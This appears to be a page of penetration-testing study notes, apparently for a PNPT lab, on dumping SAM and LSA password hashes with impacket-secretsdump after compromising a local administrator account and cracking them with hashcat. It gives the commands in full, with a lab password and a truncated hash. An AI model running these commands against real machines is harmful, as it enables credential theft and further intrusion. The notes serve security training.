Dumping and Cracking Hashes

Overview

After compromising a Local Administrator account, we can dump hashes from he SAM and LSA on the machine using secretsdump. This can be done using the accounts password or hash.

We can then crack the hashes using hashcat

On older machines that have wdigest enabled, there is a possibility to view passwords in clear-text

Secretsdump

impacket-secretsdump PNPT.local/greg:'Password1'@192.168.1.130

imapcket-secretsdump [email protected] -hashes 'aad3b435b51404eeaad3b435b51404ee:7facdc498ed1'

hashcat -m 1000 crackme.txt ~/rockyou.txt -O -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule

PreviousPass the Hash NextKerberoasting

Last updated 1 year ago

hashtagOverview

hashtagSecretsdump

Overview

Secretsdump